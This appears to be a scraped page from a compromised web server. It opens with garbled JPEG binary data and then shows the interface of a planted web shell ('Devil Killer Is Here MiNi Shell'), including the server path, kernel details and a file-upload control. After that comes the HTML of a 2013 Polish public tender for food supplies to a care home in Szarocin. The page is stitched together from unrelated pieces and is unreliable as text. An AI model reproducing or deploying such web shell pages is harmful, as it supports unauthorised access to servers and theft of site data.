JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131007/206325-N-2013.html

<p class="kh_header"><b>Kamienna Góra: Dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie</b><br>
<b>Numer ogłoszenia: 206325 - 2013; data zamieszczenia: 07.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Szarocinie , Szarocin 1, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 0-75 742 44 20, faks 0-75 742 44 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsszarocin.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie.
2. Przedmiot zamówienia podzielony został na siedem części:
Część 1 Artykuły spożywcze różne
Część 2 Nabiał i mleko
Część 3 Pieczywo
Część 4 Warzywa i owoce
Część 5 Mięso i wyroby wędliniarskie
Część 6 Ryby, mrożonki i przetwory warzywno owocowe
Część 7 Jaja
3. Szczegółowe zestawienie asortymentowe zamawianych artykułów żywnościowych zawarte jest w poniższych tabelach.
4. Użyte w załącznikach nazwy własne (towaru lub producenta) oznaczają, iż oferowany artykuł powinien być równoważy do wskazanych, tzn. powinien posiadać porównywalną wartość odżywczą i energetyczną oraz zawartość składników, a także posiadać nie gorsze cechy jakościowe w zakresie wydajności oraz zbliżone walory smakowe.
5. Zamawiający na bazie doświadczeń z lat ubiegłych oszacował zapotrzebowanie na wymienione artykuły na okres 12 miesięcy. Ilości te (podane w załącznikach) stanowią wartość szacunkową, co oznacza, że ostateczna ilość zamawiana na podstawie umowy może ulec zmianie.
6. Dostawy artykułów żywnościowych odbywać się będą w dni robocze od poniedziałku do soboty, za wyjątkiem dni ustawowo wolnych od pracy, w godzinach od 6°° do godziny 13°°. Miejscem dostawy jest siedziba Zamawiającego (Pałac Kuchnia).
7. Zamawiający będzie zamawiał wyroby sukcesywnie, w miarę potrzeb od poniedziałku do piątku za wyjątkiem dni ustawowo wolnych od pracy w godzinach od 7°°do godziny 13°°.
8. Dostawy realizowane będą w partiach, na podstawie zamówień składanych przez Zamawiającego z jednodniowym wyprzedzeniem w formie pisemnej (faksem) lub telefonicznej. W zamówieniu Zamawiający każdorazowo określi ilość i rodzaj zamawianego asortymentu.
9. Częstotliwość składanych zamówień uzależniona będzie od bieżących potrzeb Zamawiającego i zamawianego asortymentu. Szacuje się, że będzie ona średnio wynosiła: dla części 1, 4, 7 jeden raz w tygodniu, dla części 5 dwa razy w tygodniu, dla części 2 3 razy w tygodniu, dla części 3 6 razy w tygodniu i dla części 6 wg zapotrzebowania.
10. Dostarczane artykuły żywnościowe będące przedmiotem umowy muszą być: świeże, bardzo dobrej jakości i spełniać wszystkie obowiązujące w tym zakresie normy; dostarczane w oryginalnych opakowaniach producenta, z etykietą handlową identyfikującą dany artykuł i z podanym na etykiecie terminem przydatności do spożycia (nie dotyczy warzyw i owoców); dostarczane środkiem transportu spełniającym wymagania sanitarne dotyczące środków transportu żywności.
11. Podana w załącznikach waga (gramatura) dotyczy pojedynczego opakowania danego artykułu. Artykuły, dla których określono wagę opakowań nie mogą być dostarczane luzem.
12. Artykuły spożywcze powinny posiadać odpowiednio długie okresy (terminy) przydatności do spożycia, stosownie do rodzaju asortymentu.
13. W przypadku wykrycia wad zamówionych artykułów spożywczych lub ich niezgodności asortymentowej i ilościowej ze złożonym zamówieniem, Zamawiającemu przysługuje prawo złożenia reklamacji. W przypadku złożenia uzasadnionej reklamacji, Wykonawca zobowiązany jest wymienić niezwłocznie i na własny koszt towar wadliwy na wolny od wad i lub dostarczyć (uzupełnić) asortyment i ilości zgodnie z zamówieniem.
14. Reklamacje mogą być zgłaszane telefonicznie lub pisemnie przez przedstawicieli Zamawiającego wymienionych w umowie. W przypadku pisemnego zgłoszenia reklamacji, Wykonawca zobowiązany jest również pisemnie potwierdzić fakt jej przyjęcia.
15. W przypadku wystąpienia trzech udokumentowanych reklamacji, Zamawiający ma prawo do rozwiązania umowy ze skutkiem natychmiastowym.
16. W przypadku, gdy Wykonawca nie dostarczy przedmiotu umowy w ustalonych terminach lub gdy wskutek reklamacji nie dokona niezwłocznej wymiany towaru wadliwego na wolny od wad i/lub uzupełnienia asortymentu i ilości, Zamawiający ma prawo dokonać zakupu u innego dostawcy w asortymencie i ilościach odpowiadających niezrealizowanej/niewymienionej dostawie, co będzie skutkować zmniejszeniem ilości przedmiotu umowy o wielkość tego zakupu. 
17. W przypadku zaistnienia sytuacji określonej w pkt 16, Wykonawca zobowiązany będzie do zwrotu Zamawiającemu kwoty wynikającej z różnicy pomiędzy ceną zakupu a ceną wynikającą z umowy, po uprzednim przesłaniu do Wykonawcy kopii faktury zakupu danego asortymentu.
18. Do obowiązków Wykonawcy, który złoży ofertę najkorzystniejszą na Część 6. Ryby, mrożonki i przetwory warzywno owocowe, należeć będzie nieodpłatne wyposażenie Zamawiającego w 4 szt. zamrażarek, każda o pojemności 350 litrów - na czas trwania umowy. Powyższe winno być wkalkulowane w cenę oferty..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.40.00.00-2, 15.50.00.00-3, 15.81.10.00-6, 15.30.00.00-1, 15.11.00.00-2, 15.13.00.00-8, 15.20.00.00-0, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium od Wykonawców ubiegających się o udzielenie niniejszego zamówienia publicznego</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Warunki tej zmiany określone zostały w § 7 Istotnych postanowień umowy (Część III niniejszej specyfikacji)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsszarocin.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Szarocinie, Szarocin 1, 58-400 Kamienna Góra
sekretariat (II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2013 godzina 09:45, miejsce: Dom Pomocy Społecznej w Szarocinie, Szarocin 1, 58-400 Kamienna Góra
wyłącznie w sekretariacie (II piętro) lub listownie/przesyłką na adres Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ta część zamówienia obejmuje dostawę następujących artykułów:
1 Makaron nitki (np. makaron Sudecki, Lubella) - 300 kg
2 Syrop zagęszczany do napojów (430 ml - 1 l)	- 400 litrów
3 Woda mineralna gazowana - butelki 0,5 l - 500 litrów
4 Woda mineralna gazowana - butelki 1,5 l - 3000 litrów
5 Woda mineralna niegazowana - butelki 0,5 l - 500 litrów
6 Woda mineralna niegazowana - butelki po 1,5 l - 1000 litrów
7 Oranżada - butelka 1,5 l (różne smaki) - 800 szt.
8 Koncentrat pomidorowy 30% (0,9 - 1 kg - typu: Dawtona, Halmir, Pudliszki) - 	240 kg
9 Sól	- 1000 kg
10 Pasztet z drobiu 160 g (typu prochowicki) - 300 kg
11 Pasztet z drobiu 300 g (typu prochowicki) - 300 kg
12 Konserwy mięsne wieprzowe 300 g - 150 kg
13 Pasztet wieprzowy 500 g - 200 kg
14 Ogórek konserwowy - opakowanie duże dla gastronomii - 500 kg
15 Papryka konserwowa krojona - opakowanie duże dla gastronomii - 200 kg
16 Mąka pszenna (1 kg - typu: Bolesławiec, Dolnośląska, Basia) - 1500	kg
17 Mąka tortowa (1 kg - typu: Bolesławiec, Dolnośląska, Basia) -	500	kg
18 Mąka ziemniaczana	- 200	kg
19 Kasza manna - 500	kg
20 Kasza jęczmienna - 600	kg
21 Kasza kukurydziana -	200	kg
22 Cukier - wyrób polski - Kategoria I (1 kg) - 6000	kg
23 Cukier puder (0,4 - 1 kg)	- 50	kg
24 Groszek konserwowy - opakowanie duże dla gastronomii	- 400	kg
25 Kukurydza konserwowa - opakowanie duże dla gastronomii - 150	kg
26 Fasola konserwowa - opakowanie duże dla gastronomii - 100	kg
27 Chrzan konserwowy tarty	- 100	kg
28 Musztarda - 200 kg
29 Ocet (0,5 - 1 l) - 100	litr
30 Olej roślinny (opak. 1 l) -	200	litr
31 Olej roślinny (opak. 3 l) -	150	litr
32 Olej słonecznikowy (opak. 1 l) - 30	litr
33 Olej z oliwek (opak. 0,5 l)	- 15 	litr
34 Miód lipowy (900 - 1000 g) -	50	kg
35 Krem czekoladowy (250 - 500 g) -	300	kg
36 Dżemy (250 - 300 g, różne smaki, typu Łowicz) -	500	kg
37 Marmolada wieloowocowa (300 - 600 g)	- 400	kg
38	Masa makowa (0,4 - 0,6 kg)	- 40	kg
39	Brzoskwinie w puszce (0,5 - 1 kg)	- 20	kg
40	Wiórki kokosowe	- 30	kg
41	Rodzynki	- 15	kg
42	Cukier waniliowy (typu: Delecta, Dr Oetker)	- 10	kg
43	Cynamon	- 3	kg
44	Kwasek cytrynowy -	10	kg
45	Proszek do pieczenia -	10	kg
46	Budyń - różne smaki (typu Winiary, Dr Oetker)	- 100	kg
47	Żelatyna	- 15	kg
48	Galaretka- różne smaki (typu Winiary, Dr Oetker) -	100	kg
49	Śledź w pomidorach 170 g	- 150	kg
50	Śledź w oleju 170 g	- 150	kg
51	Szprot w pomidorach 170 g	- 150	kg
52	Szprot w oleju 170 g	- 150	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nabiał i mleko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ta część zamówienia obejmuje dostawę następujących artykułów:
1	Ser biały (chudy, półtłusty, tłusty) -	600	kg
2	Ser topiony	- 500	kg
3	Serek homogenizowany - różne smaki (140 -150 g) -	400	kg
4	Śmietana 18%	- 1 000	kg
5	Śmietana 30%	- 150	kg
6	Jogurt owocowy - różne smaki (125 g) - 	9 000	szt.
7	Masło extra (osełka po 100 g)	 - 200	kg
8	Masło smakowe typu smaksełko po 100 g	- 100	kg
9	Margaryna do smarowania pieczywa typu DELMA - 	2 200	kg
10	Ser żółty (typu gouda)	- 200	kg
11	Ser żółty (typu salami)	- 200	kg
12	Ser żółty (typu dziurawiec)	- 200	kg
13	Ser żółty (typu morski)	- 200	kg
14	Ser żółty (EDAMSKI)	- 100	kg
15	Ser żółty wędzony	- 100	kg
16	Margaryna do pieczenia typu KASIA -	200	kg
17	Margaryna mleczna	- 700	kg
18	Mleko	- 12 000	l
19	Maślanka  400 g	- 840	szt.
20	Deser różny  150 g	- 700	szt.
21	Kefir  380 g	- 725	szt.
22	Serek wiejski 150 g	- 90	kg
23	Serek śniadaniowy 125 g	- 990	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ta część zamówienia obejmuje dostawę następujących artykułów:
1	Chleb zwykły krojony	- 11 000	kg
2	Bułka pszenna wrocławska	- 2 600	kg
3	Bułka mała	- 36 000	szt.
4	Bułka tarta	- 2 400	kg
5	Chleb ciemny razowy	- 200	kg
6	Bułka słodka	- 600	szt.
7	Bułka razowa	- 600	szt.
8	Pączki	- 2 000	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ta część zamówienia obejmuje dostawę następujących artykułów:
1	Burak czerwony (10 - 15 kg)	- 800	kg
2	Cebula (10 - 15 kg)	- 1 040	kg
3	Marchew (10 - 15 kg)	- 1 120	kg
4	Seler	- 20	kg
5	Ziemniaki (15 - 25 kg)	- 16 500	kg
6	Ogórek świeży	- 1 630	kg
7	Ogórek kiszony (beczka)	- 230	kg
8	Kapusta pekińska	- 70	kg
9	Kapusta kiszona (beczka)	- 800	kg
10	Kapusta biała młoda	- 600	szt.
11	Kapusta biała 	- 700	kg
12	Kapusta włoska	- 100	szt.
13	Kapusta czerwona -	190	kg
14	Sałata	- 264	szt.
15	Kalafior świeży	- 100	szt.
16	Koper świeży	- 70	pęczków
17	Pietruszka natka świeża	- 70	pęczków
18	Jabłka (10 - 15 kg, skrzynka)	- 1 300	kg
19	Pomidory świeże	- 1 330	kg
20	Szczypior	- 70	pęczków
21	Czosnek krajowy	- 280	szt.
22	Pietruszka korzeń	- 35	kg
23	Por	- 35	kg
24	Seler	- 35	kg
25	Cytryny - 480	kg
26	Groch łuskany (suchy) -	120	kg
27	Fasola Jasiek (suchy)	- 80	kg
28	Orzech włoski łuskany	- 7	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mięso i wyroby wędliniarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ta część zamówienia obejmuje dostawę następujących artykułów:
1	Filet z piersi kurczaka	- 500	kg
2	Skrzydełko z kurczaka	- 150	kg
3	Porcja rosołowa z kurczaka	- 1 400	kg
4	Kurczak świeży	- 700	kg
5	Udziec z indyka b/k	- 500	kg
6	Ćwiartki z kurczaka	- 300	kg
7	Udka z kurczaka z obciętym grzbietem	- 300	kg
8	Wątroba drobiowa	- 150	kg
9	Wątroba wieprzowa	- 150	kg
10	Wołowina - gulasz wołowy (kawałki co najmniej 10 cm × 10 cm)	- 150	kg
11	Wołowina b/k pieczeniowa	- 100	kg
12	Wieprzowina - golonka	- 200	kg
13	Wieprzowina - schab b/k	- 200	kg
14	Wieprzowina - szynka b/k	- 250	kg
15	Wieprzowina - łopatka b/k i bez tłuszczu	- 1 000	kg
16	Wieprzowina - karkówka b/k (waga 1 szt. karczku nie przekracza 2 kg)	- 300	kg
17	Wieprzowina - podgardle	- 200	kg
18	Wieprzowina - pachwina	- 500	kg
19	Wieprzowina - nóżki	- 150	kg
20	Wieprzowina - przedgolonki	- 150	kg
21	Żeberka wieprzowe	- 100	kg
22	Wieprzowina - skórki	- 100	kg
23	Wieprzowina - kości schabowe	- 150	kg
24	Parówki drobiowe	- 150	kg
25	Polędwica drobiowa	- 80	kg
26	Polędwica z warzywami	- 60	kg
27	Kiełbasa parówkowa serdelki	- 600	kg
28	Kiełbasa parówkowa cienka	- 600	kg
29	Kiełbasa śląska	- 150	kg
30	Kiełbasa szynkowa	- 100	kg
31	Kiełbasa szynkowa drobiowa	- 100	kg
32	Kiełbasa wiejska	- 100	kg
33	Kiełbasa mielonka	- 200	kg
34	Kiełbasa sucha	- 150	kg
35	Kiełbasa zwyczajna	- 400	kg
36	Kiełbasa krakowska	- 80	kg
37	Kiełbasa mortadela	- 500	kg
38	Kiełbasa piwna	- 100	kg
39	Kiełbasa podwawelska	- 100	kg
40	Kiełbasa biała parzona	- 150	kg
41	Kiełbasa biała surowa	- 150	kg
42	Kiełbasa krakowska podsuszana drobiowa	- 80	kg
43	Kiełbasa żywiecka	 - 80	kg
44	Kiełbasa golonkowa	- 80	kg
45	Kiełbasa jałowcowa	- 70	kg
46	Kiełbasa polska pieczona	- 100	kg
47	Schab wędzony	- 50	kg
48	Blok szynkowy	- 100	kg
49	Mielonka tyrolska	- 80	kg
50	Ogonówka wędzona	- 80	kg
51	Baleron	- 80	kg
52	Filet wędzony drobiowy	- 70	kg
53	Filet z piersi indyka	- 100	kg
54	Boczek surowy	- 150	kg
55	Boczek wędzony	- 200	kg
56	Boczek faszerowany -	80	kg
57	Rolada boczkowa	- 80	kg
58	Szynka gotowana	 - 400	kg
59	Szynka drobiowa prasowana	- 80	kg
60	Salceson czarny	- 100	kg
61	Salceson drobiowy	- 100	kg
62	Salceson wieprzowy	- 150	kg
